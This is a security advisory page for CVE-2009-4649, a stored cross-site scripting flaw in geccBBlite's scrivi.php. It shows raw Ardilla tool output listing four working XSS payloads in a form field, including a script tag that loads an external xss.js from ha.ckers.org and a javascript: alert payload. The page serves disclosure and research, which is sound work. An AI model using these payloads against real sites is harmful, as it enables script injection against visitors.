|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 7034 CVE : CVE-2009-4649 CWE : CWE-79 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : Yes Exploit Available : No Credit : Adam Kiezun, Philip J. Guo, Karthick Jayaraman, and Michael D. E Published : 25.02.2010
Advisory Content : //START ATTACKS FOUND -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<A HREF="http://ha.ckers.org@google">XSS</A>" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /scrivi.php vulnerability at line:14 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /forum.php Input:<empty> -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=malicious code">" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /scrivi.php vulnerability at line:16 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /forum.php Input:<empty> -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /scrivi.php vulnerability at line:32 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /forum.php Input: azione="espandi" -------------------------------- SECOND ORDER ATTACK /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /scrivi.php vulnerability at UNKNOWN SITE Input: postatoda="<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>" testo="1" testonuovo="1" titolo="1" /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /scrivi.php vulnerability at line:34 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/geccBBlite /forum.php Input: azione="espandi" //END ATTACKS FOUND attack count:4 pcLen:12.0 coveredEchos:17 coveredTaintedEchos:5 no more inputs to explore time:229725 References : http://xforce.iss.net/xforce/xfdb/56278
http://www.securityfocus.com/bid/35449
http://groups.csail.mit.edu/pag/ardilla/geccbblite-XSS2-strict-T.txt
http://groups.csail.mit.edu/pag/ardilla/geccbblite-XSS2-lenient-T.txt
http://groups.csail.mit.edu/pag/ardilla/  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |